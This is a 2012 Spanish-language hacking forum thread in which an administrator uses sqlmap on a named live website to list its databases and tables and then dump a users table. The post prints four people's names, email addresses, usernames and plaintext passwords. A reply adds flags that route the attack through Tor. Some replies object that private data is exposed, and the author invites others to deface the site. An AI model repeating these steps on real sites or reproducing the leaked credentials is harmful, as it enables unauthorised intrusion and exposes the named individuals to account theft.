send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

SQLi Automatizado con SQLMAP

  • 10 Respuestas
  • 5975 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5311
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Octubre 08, 2012, 01:37:38 am »

Introducción:

En este paper veremos como obtener los datos de admin de una base de datos utilizando SQLMAP.
Para este tutorial usare Backtrack, ya que viene instalado y está listo para usarse.
Para abrirlo vamos a:

Applications  >>  Backtrack  >>  Exploitation Tools  >>  Web Exploitation Tools  >>  sqlmap

A penas abrimos sqlmap, podremos ver todos los parámetros disponibles, ahora solo usaremos los elementales.


Voy a usar una web vulnerable smartenergyhome.eu
Las querys las haremos desde aquí: smartenergyhome.eu/eng/seh-buildings.php?id=9

Extracción de información

Comenzaremos sacando los nombres de las bases de datos, para ello tipeamos:

python sqlmap.py -u target.com/index.php?id=9 --dbs


El programa comenzara a buscar las bases de datos y las mostrara una vez que finalice de correr


En mi caso me trajo 2, de las cuales una es por el cpanel y la otra es de la web.
La que usaremos será la segunda “smartene_SEH
Ahora que tenemos el nombre de la base de datos, sigue buscar las tablas que posee, para ello vamos a tipear:

python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH -- tables


Este comando nos arrojara todas las tablas que tiene el sistema, y obviamente debemos buscar alguna que contenga datos de administradores para podernos loguear


En mi caso, la última tabla tiene el nombre “usuarios” por lo tanto, esa debe ser la tabla que tiene los datos de los admines.
Ahora veremos las columnas que tiene esa tabla de usuarios, para ver si en verdad tiene algún usuario y contraseña para luego entrar al panel de admin…
Ahora que conocemos el nombre de la tabla, vamos a tipear ahora lo siguiente:

python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH –T usuarios -- columns


Esto nos devolverá los nombres de las columnas que tiene dicha tabla.


 Como podemos ver, hemos dado con la tabla que buscábamos. Esta tabla posee usuarios y contraseñas.
Para poder ver que datos contiene esta tabla, vamos a tipear:

python sqlmap.py -u target.com/index.php?id=9 –D smartene_SEH –T usuarios --dump

Una vez ejecutado el comando, nos dará los datos que contiene esa tabla


Código: Text
  1. +----+------------------------+------------------+----------+---------------------+----------+
  2. | id | email                  | nombre           | usuario  | editado             | password |
  3. +----+------------------------+------------------+----------+---------------------+----------+
  4. | 1  | g.zapico@netavanza.com | Gustavo Zapico   | gzapico  | 2009-03-02 06:02:34 | medica3  |
  5. | 2  | genis@vis-tek.com      | Gen\xeds Bayarri | gbayarri | 2009-03-02 06:20:37 | vis-tek  |
  6. | 3  | j.berg@bwcv.es         | Josefin Berg     | jberg    | 2009-03-12 05:05:38 | seh2009  |
  7. | 4  | l.bax@bwcv.es          | Laszlo Bax       | lbax     | 2010-03-26 16:46:18 | seh2009  |
  8. +----+------------------------+------------------+----------+---------------------+----------+

 Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.
ANTRAX


Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #1 en: Octubre 08, 2012, 11:56:56 am »
Gracias por aportar, pero me gustaria hacerlo sin usar tool, pero para eso estoy estudiando sql desde 0



<!-- Saludos -->

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5311
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #2 en: Octubre 08, 2012, 12:26:08 pm »
Aca te dejo la forma manual desde cero: You are not allowed to view links. Register or Login
Y aca tenes Blind SQLi manual tambien desde cero: You are not allowed to view links. Register or Login

Saludos!


Desconectado c1st

  • *
  • Underc0der
  • Mensajes: 11
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Octubre 08, 2012, 12:31:15 pm »
Nunca esta demás saber como utilizarlo con Tor si creyeran que fuese necesario. y esto se hace de la siguiente manera:

Se debe agregar en la linea de comandos explicada por ANTRAX lo siguiente:

Código: Text
  1. --tor --check-tor --tor-port=35978 --tor-type=SOCKS5

De donde obtenemos esta informacion para saber si esta correcta con la configuracion propia de Tor? , gracias a la suite Vidalia
Donde al comenzar a correr tor, vamos al navegador que se abre -< Preferencias  y vemos el protocolo de la proxy y el puerto.




Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5311
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #4 en: Octubre 08, 2012, 12:36:51 pm »
Buenisimo aporte!
Muchas gracias por complementar el post bro!


Desconectado [C]orrupted[B]yte

  • *
  • Underc0der
  • Mensajes: 172
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • R00TW0RM
    • Email
« Respuesta #5 en: Octubre 08, 2012, 01:48:04 pm »
Código: You are not allowed to view links. Register or Login
Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.

bitch please estas exponiendo informacion privada y la url completa del sitio si vas a estar de blackhat no vengas justificandote despues, acepta responsabilidades y simplemente no te justifiques al final de post.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5311
  • Actividad:
    51.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #6 en: Octubre 08, 2012, 01:50:10 pm »
El tutorial fue hecho con fines educativos, la falla ya fue reportada.
Yo no colgare un index ni nada de eso.
El que desee hacerlo, adelante


Desconectado zoro248

  • *
  • Underc0der
  • Mensajes: 242
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #7 en: Octubre 08, 2012, 05:26:29 pm »
You are not allowed to view links. Register or Login
Aca te dejo la forma manual desde cero: You are not allowed to view links. Register or Login
Y aca tenes Blind SQLi manual tambien desde cero: You are not allowed to view links. Register or Login

Saludos!
Muchas Gracias ya los estoy checando

<!-- Saludos -->

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« Respuesta #8 en: Octubre 08, 2012, 08:51:17 pm »
You are not allowed to view links. Register or Login
Nunca esta demás saber como utilizarlo con Tor si creyeran que fuese necesario. y esto se hace de la siguiente manera:

Se debe agregar en la linea de comandos explicada por ANTRAX lo siguiente:

Código: Text
  1. --tor --check-tor --tor-port=35978 --tor-type=SOCKS5

De donde obtenemos esta informacion para saber si esta correcta con la configuracion propia de Tor? , gracias a la suite Vidalia
Donde al comenzar a correr tor, vamos al navegador que se abre -< Preferencias  y vemos el protocolo de la proxy y el puerto.



Tambien estaria bueno que explique como cambiar el user agent.

Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    1.67%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Octubre 24, 2012, 07:32:57 am »
You are not allowed to view links. Register or Login
Código: You are not allowed to view links. Register or Login
Al ser este un tutorial educativo, no ingresaremos al sistema. Simplemente se expone el manejo de esta poderosa herramienta.

bitch please estas exponiendo informacion privada y la url completa del sitio si vas a estar de blackhat no vengas justificandote despues, acepta responsabilidades y simplemente no te justifiques al final de post.

comparto la opinion, si quisieras hacer algo "etico" podrias con el tuto adjuntar un ejemplo de una aplicacion mal codeada a proposito, con las configuraciones que deben ser onda escenario "real". De onda el comentario :P

Desconectado BCKTR1X

  • *
  • Underc0der
  • Mensajes: 117
  • Actividad:
    0%
  • Reputación 0
  • loading.....
    • Ver Perfil
« Respuesta #10 en: Noviembre 30, 2012, 02:10:46 am »
esta exelente  ;D

 

¿Te gustó el post? COMPARTILO!



SQLI tutorial pour débutants ( newbie) ecrite par *..::Key-m0rt::..*

Iniciado por ..::key-m0rt::..

Respuestas: 0
Vistas: 1552
Último mensaje Marzo 23, 2010, 12:38:21 pm
por ..::key-m0rt::..
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface]

Iniciado por Xt3mP

Respuestas: 0
Vistas: 1334
Último mensaje Julio 21, 2010, 07:43:44 pm
por Xt3mP
LFI+SQLI [Incluyendo ficheros a travez de valores enteros]

Iniciado por q3rv0

Respuestas: 4
Vistas: 1585
Último mensaje Julio 24, 2013, 01:43:36 pm
por M5f3r0
Blind SQLi Boolean Based mysql

Iniciado por arthusu

Respuestas: 2
Vistas: 1912
Último mensaje Mayo 26, 2013, 04:01:07 pm
por WARsec
Métodos para bypassear un WAF en Inyección SQLi

Iniciado por M5f3r0

Respuestas: 6
Vistas: 2928
Último mensaje Agosto 05, 2013, 01:24:32 pm
por Mr. Foster